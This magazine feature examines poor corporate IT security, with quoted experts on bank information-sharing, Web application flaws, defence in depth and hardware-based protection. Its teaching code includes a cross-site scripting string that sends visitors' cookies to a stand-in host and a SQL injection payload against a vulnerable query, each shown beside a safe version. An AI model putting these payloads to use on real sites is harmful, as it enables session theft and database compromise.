The insecure corporation

When it comes to business, the Canadian enterprise is often a nimble-footed creature capable of outwitting its competition in the blink of an eye. Yet when it comes to IT security, it is often a lead-footed beast, vulnerable to a host of lurking predators. The reality is that, outside of a few specific industries, IT security is often more illusion than substance.

A few years ago IBM Corp. did a study, subsequently verified by others, that found on average one software bug per thousand lines of code – a statistic that doesn’t set off any alarms until one realizes most operating systems tally their lines of code in the tens of millions, which at that rate works out to tens of thousands of latent bugs. The result is that the software used to write this article, the operating system on which it sits, and the firewall technology keeping hackers off my machine are all full of bugs – some merely a nuisance, some exploitable vulnerabilities. The same can be said for your entire corporate network.
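As a back-of-envelope illustration of that defect rate, here is the arithmetic in code form; the one-bug-per-thousand-lines figure is the study’s, but the line counts below are assumptions chosen only to show the scale, not measured figures for any particular product.

```python
# Rough defect estimate using the roughly one-bug-per-thousand-lines rate
# cited above. The line counts are illustrative assumptions only.
BUGS_PER_KLOC = 1  # one bug per thousand lines of code

code_bases = {
    "desktop operating system": 40_000_000,  # assumed lines of code
    "office suite": 25_000_000,              # assumed
    "personal firewall": 2_000_000,          # assumed
}

for name, lines in code_bases.items():
    bugs = lines // 1000 * BUGS_PER_KLOC
    print(f"{name}: ~{bugs:,} latent bugs")
```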

But for a CIO, all is not lost. In fact there are a variety of things that can be done to improve corporate security. Some require time, some require cooperation, and all require patience.

Few elite athletes succeed entirely on their own. Barry Bonds’ prodigious home run production has a lot to do with his incredible understanding of his environment. He reviews video footage of opposing pitchers to understand the probability of events occurring in specific situations. IT security isn’t quite this simple, but much can be learned from watching others. The best help, ironically, often comes from the least likely source – your competition.

Sharing security best practices

The Canadian banking industry has learned this lesson and as a result is considered by security experts to be at the head of the class. In fact its reputation for IT security is internationally renowned. But it wasn’t always this way.

Robert Garigue, the chief information security officer with BMO Financial Group, knows that he, and by extension his company, can learn from the competition. About four years ago some senior vice-presidents at the major Canadian financial institutions got together to start sharing best practices. Admittedly it wasn’t entirely based on altruism. There was a dose of self-preservation in their reasoning, since banks are heavily connected by business-to-business relationships and third-party services.

“We have an understanding that we are all in the network together, and there is a vested interest in sharing best practices around security,” he said. The banks realized that if one was brought down by a hack, the others were instantly at risk. But even knowing this, sharing was not an easy sell. “I have seen people who were uncomfortable because it has not been the approach in the past. Security used to be seen as more internal protection, and sometimes the horror stories weren’t shared,” Garigue said.

Fortunately, wiser heads prevailed. For the past several years the banks have been sharing information. This year, head security officers from the major Canadian financial institutions had their first meeting. “There are issues we have to wrestle with; we have shared risk, we have shared dependencies,” said Garigue. “There has been a sense that information security now is a community practice.”

Admittedly, not every industry has the same motivations to share information security best practices. But banking’s track record is enviable. In fact it is the only Canadian industry that consistently receives high marks for both its practices and end results.

Need for risk assessment

If the competition shows no interest in sharing security best practices, industry standards are another option. ISO 17799, the international standard for information security management, describes itself as “a comprehensive set of controls comprising best practices in information security.” It has ten sections, covering everything from security policy and system access control to business continuity management and compliance.

The starting point is risk assessment. It is something most companies do, but not frequently enough, according to experts.

“How do you know how secure you are now, not two weeks ago?” asks Simon Perry, vice-president of eTrust Solutions with Computer Associates plc. “Most companies can’t do that.” In order to do so, a company has to move to “near-real time” reporting on everything from the state of antivirus software to the level of corporate legislative compliance.

To move in this direction, some consistent metrics are needed throughout an organization. A classic problem – one Perry has seen time and time again – is when IT change management professionals and security management people use completely different metrics for deciding whether to go ahead with a project. The former change technology when added functionality is required or a problem needs to be fixed to guarantee an internal service level agreement. The latter are looking to fix vulnerabilities before they become problems, knowing full well the fixes will never add functionality and may well take some away. On the surface, he noted, “those two guys have diametrically opposed goals.”

Perry said the solution, as simple as it sounds, is to have the two departments make each other’s acquaintance. In large organizations they may never have met.

Jack Sebbag, Canadian general manager with Network Associates Inc., said for security to work at this level there has to be one person with ownership, usually a chief security officer. When changes are made, he or she can fully inventory what is taking place. But “empowerment must come with the position,” he said. Too often corporate politics has caused CSOs to fail. If CIOs aren’t up to date on security issues, they can exacerbate the problem.

Lagging understanding of threats

None of this is too surprising to security experts, who see senior executives often focused on the wrong security targets. For example, “threats today are not really at the network layer and haven’t been so for a couple of years,” said John Alsop, CEO of Borderware. Now almost all threats are application-specific, he added. But surveys of senior executives seldom show this level of understanding.

Entire corporate initiatives often float under the security radar. Most of the time it is a non-issue, but when the initiative involves a Web application, the story is entirely different.

While the Web is a good delivery method for data, it is a difficult medium to secure since many of the vulnerabilities need nothing more than a Web browser to exploit them, said Matt Fisher, a security engineer with SPI Dynamics.

The vulnerabilities associated with Web applications go back to the IBM study: writing totally secure software is impossible.

“We certainly don’t want to say the sky is falling but…no matter how much money we spend, we are ultimately going to find that there is some rate of vulnerability,” said Dave Safford, manager, global security analysis lab with IBM.

“Even at the highest levels you are looking at hundreds or thousands of bugs per million lines of code, even at the very best software shops in the world,” said Richard Reiner, CEO of FSC Internet. “In the work we’ve done for banks…100 per cent of the applications that we have been asked to review in the last year have had at least one critical security vulnerability.”

Garigue isn’t surprised. “You have to understand that this is not the laws of physics that we are dealing with.”

Developers lack training

Web applications are built for user acceptance and business functionality, and they are stress-tested against traffic loads, but they infrequently have security built in at the development phase. “For the most part, developers aren’t taught security,” SPI’s Fisher said.

At a recent Toronto conference, security experts agreed. Developers’ understanding of the importance of security “is still shaky…but it is getting there,” said Tim Dafoe, a senior security designer with the Ontario provincial government. Though he and the other security people he works with are aware of hacking techniques such as SQL injection – slipping malicious SQL commands into an application through unvalidated input – developers tend not to be. Mike Pill, who manages developers at a municipally run organization, agreed that developers are often unaware of the exploits used by hackers to break their Web creations. “It’s not taught in school,” he said.

On almost every Web site “there will be cross-site scripting and SQL injection [vulnerabilities] – guaranteed,” Fisher said.
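To make the cross-site scripting half of that claim concrete, here is a minimal sketch of a hypothetical page that echoes user input into HTML; the markup and attack string are illustrative assumptions, not examples from the article.

```python
# Minimal cross-site scripting (XSS) sketch: a hypothetical comment page
# that echoes user input back into HTML. Names and markup are illustrative.
import html

def render_comment_unsafe(comment: str) -> str:
    # Vulnerable: user input is dropped straight into the page, so a
    # submitted <script> tag will execute in every visitor's browser.
    return f"<p>Visitor said: {comment}</p>"

def render_comment_safe(comment: str) -> str:
    # Safer: escape HTML metacharacters so the input is displayed as text.
    return f"<p>Visitor said: {html.escape(comment)}</p>"

attack = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
print(render_comment_unsafe(attack))  # script tag survives intact
print(render_comment_safe(attack))    # rendered as harmless text
```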

Firewalls aren’t going to be a great deal of help, since the attack is designed to look like legitimate traffic. Additionally, not all Web application hijackings are going to trigger your intrusion detection system, since it may be set to track failed login attempts rather than, say, repeated session ID requests. “So you can use brute force attacks without triggering alarms,” Fisher said.

Building your own applications carries some risk. “When you’ve built the application, you are the only source of patches,” Reiner said. But off-the-shelf software isn’t a dream either, he added. It may sound extreme, but Reiner suggests testing even known large-scale applications such as ERP suites. The notion that off-the-shelf software is inherently more secure is a fallacy, he said.

The key is to deal with these security problems in their development infancy. To borrow a line from Crosby, Stills and Nash: “Teach your developers well.” The more secure the code is at the outset, the fewer problems there will be in the long run. This may seem like the ultimate no-brainer, but it is seldom done, the experts said, and it has practical security ramifications. “Testing activities [after software is built] cannot ever guarantee all the vulnerabilities have been found…you can’t prove a negative,” Reiner warned.

SQL injection threat

One of the reasons simple software vulnerabilities are such a security nightmare is that many developers are looking down from 30,000 feet, seeing the overall functionality of the end product, not what can go wrong at every level.

The SQL injection technique – by far the most lethal attack out there, according to Fisher – requires only one parameter to be hacked to compromise an entire Web site. Something as innocuous as a poorly coded page where a postal code is used to request driving directions from a database can generate enough information for a hacker to subsequently take over the entire site. And since the page in question contains no sensitive customer data, its security is often overlooked.
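A minimal sketch of what such a single-parameter hole can look like, using a hypothetical driving-directions lookup; the table, column and input names are assumptions, and the parameterized version shows the standard fix.

```python
# SQL injection sketch built around a hypothetical "driving directions"
# lookup. Table and column names are illustrative assumptions.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE stores (postal_code TEXT, directions TEXT)")
conn.execute("INSERT INTO stores VALUES ('M5V1J1', 'Take Front St. west')")

def directions_unsafe(postal_code: str):
    # Vulnerable: user input is concatenated straight into the SQL string,
    # so a crafted postal code can rewrite the query itself.
    query = f"SELECT directions FROM stores WHERE postal_code = '{postal_code}'"
    return conn.execute(query).fetchall()

def directions_safe(postal_code: str):
    # Safer: the driver treats the input strictly as data, never as SQL.
    query = "SELECT directions FROM stores WHERE postal_code = ?"
    return conn.execute(query, (postal_code,)).fetchall()

# A legitimate lookup returns one row; the injected input below tricks the
# unsafe version into returning every row in the table.
print(directions_unsafe("M5V1J1"))
print(directions_unsafe("' OR '1'='1"))   # injection: WHERE clause always true
print(directions_safe("' OR '1'='1"))     # returns nothing - input stayed data
```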

Reiner said this fundamental problem exists because software is designed with no clear model of what trust relationships exist within an application. “Once the data is in the application, it is trusted.” More sophisticated development shops build modules within the application that are designed to be skeptical of information: when new data crosses those boundaries, it is not automatically accepted as legitimate or “trusted.” He calls this creating “mutually distrusting components.” With that approach, hijacking the driving-directions page would let you go no further. But “it is a very small minority of organizations that really have a grasp of this stuff – very small.”
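A minimal sketch of the “mutually distrusting components” idea, assuming a downstream billing module that re-validates whatever the front end hands it; every name here is hypothetical.

```python
# Sketch of mutually distrusting components: the billing module does not
# trust data handed to it by the web front end, even though both live in
# the same application. All names here are hypothetical.
import re

class UntrustedInputError(ValueError):
    pass

def billing_lookup(account_id: str) -> str:
    # Boundary check: re-validate at the module edge instead of assuming
    # the caller already cleaned the value.
    if not re.fullmatch(r"[0-9]{6,10}", account_id):
        raise UntrustedInputError(f"rejected account id: {account_id!r}")
    # ... proceed with a parameterized database lookup ...
    return f"balance for account {account_id}"

print(billing_lookup("12345678"))          # accepted
try:
    billing_lookup("1234'; DROP TABLE accounts;--")
except UntrustedInputError as err:
    print(err)                             # rejected at the trust boundary
```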

At BMO, they use two feedback loops, Garigue said. The first is inside the development cycle and focuses on quality assurance testing in accordance with secure code practices. The second is when the system is set to go live and is going through vulnerability testing. Here new exposures may be found and they are fed back into the QA process to shorten the development cycle. “You have a lot of knowledge transfer that has to go on,” he said. And “to a large extent if you can incorporate that [found] vulnerability into a toolset…you’ve got that knowledge transfer,” he said. “You’ve got a corporate memory, if you want.”

Defence in depth

Yet even when Web application design has been taken as far as it can go, there is an unfortunate trend toward opening up the firewall and having the application “protect itself,” noted Reiner. “Even if you get it all right, it is a single tier of defence and I am increasingly of the opinion that [this] just isn’t good enough.”

Reiner said it’s like telling your CSO that your team has hardened the servers and configuration management to the point that firewalls are unnecessary. “He’d tell you you’re crazy,” he said. But with Web applications this attitude is often deemed acceptable.

A better solution is true defence in depth, achieved by properly configuring your systems, hardening your operating systems and maintaining a strong change management process. Tie this into dedicated layers of firewall, intrusion detection and authentication, and you get a multiplying effect, Reiner said. And you stand a fighting chance.
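A rough illustration of that multiplying effect: the layers below are the ones Reiner names, but the bypass probabilities are invented purely to show the arithmetic of roughly independent controls, and are not figures from the article.

```python
# Rough illustration of why independent layers multiply: if each control
# fails to stop an attack with some probability, and failures are roughly
# independent, the chance that ALL of them fail shrinks multiplicatively.
# The probabilities below are illustrative assumptions only.
layers = {
    "hardened OS / configuration management": 0.20,
    "network firewall": 0.15,
    "intrusion detection": 0.30,
    "authentication": 0.10,
    "application input validation": 0.25,
}

breach_probability = 1.0
for name, p_bypass in layers.items():
    breach_probability *= p_bypass

print(f"chance an attack slips past every layer: {breach_probability:.5f}")
# versus relying on the application alone:
print(f"chance with a single tier of defence:   {layers['application input validation']:.2f}")
```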

Garigue agrees with this strategy. “The defence in depth argument is that you have got boundaries around your firewall…around your servers…around your applications…and around your content.” Security is making sure you have alignment across those points – “consumer to mainframe,” he said.

But for many organizations the applications are already in place and redeveloping them is impossible. Reiner said about 50 vulnerabilities is a typical find for his teams – perhaps half of them critical or severe, and the rest serious or warnings.

Using hardware for protection

In the future, there may be a way around this if the work IBM is doing in autonomic computing comes to fruition: Web applications will be able to let hardware devices help protect them. In fact much of IBM’s recent work is based on the premise that software will always be imperfect, and that it is time to move back to hardware for improved security.

In principle it is quite simple. If data is spread out over multiple servers (much like RAID), each running a different operating system and/or hardware, hackers would have to control a majority of the machines to get at any of it. For example, if the data is spread over an IBM database running on Linux and an Oracle database on Windows, multiple operating systems and applications would have to be hacked to successfully retrieve information. So a credit card number could be parsed out over several servers. Throw in encryption run by a PCI card sitting on the server, and the end result is an essentially unhackable system. Since the PCI card generates the encryption and decryption, and is unreachable from the OS, a hacker who has somehow managed to compromise enough servers would still be left with nothing but encrypted gibberish.
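A minimal sketch of the splitting half of that idea, using simple XOR secret sharing in which every share is needed to reconstruct the card number; it illustrates the principle only and is not IBM’s actual scheme, which also leans on hardware-based encryption and can tolerate missing servers via threshold schemes.

```python
# XOR secret-sharing sketch: split a card number into shares so that no
# single server's share reveals anything, and all shares are needed to
# reconstruct it. Illustrative only; not IBM's actual design.
import secrets
from functools import reduce

def split(secret: bytes, num_shares: int) -> list[bytes]:
    # All shares but one are random; the last is chosen so that the XOR of
    # every share reproduces the secret.
    shares = [secrets.token_bytes(len(secret)) for _ in range(num_shares - 1)]
    last = bytes(reduce(lambda a, b: a ^ b, column) for column in zip(secret, *shares))
    return shares + [last]

def combine(shares: list[bytes]) -> bytes:
    return bytes(reduce(lambda a, b: a ^ b, column) for column in zip(*shares))

card_number = b"4111111111111111"      # illustrative card number
shares = split(card_number, 3)         # e.g. Linux/DB2, Windows/Oracle, third host
print([s.hex() for s in shares])       # each share alone is random noise
print(combine(shares))                 # all three together recover the number
```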

“The bottom line is, if we have software compromised…we can say it doesn’t matter,” IBM’s Safford said.

Whether this technology will solve the problems of large-scale online operations, which may not have the computing power to keep credit cards encrypted at all times, remains to be seen. Safford said IBM should have the technology available within the next three to five years.

Chris Conrath is a department editor at ComputerWorld Canada where he covers security and privacy. He can be reached at [email protected].
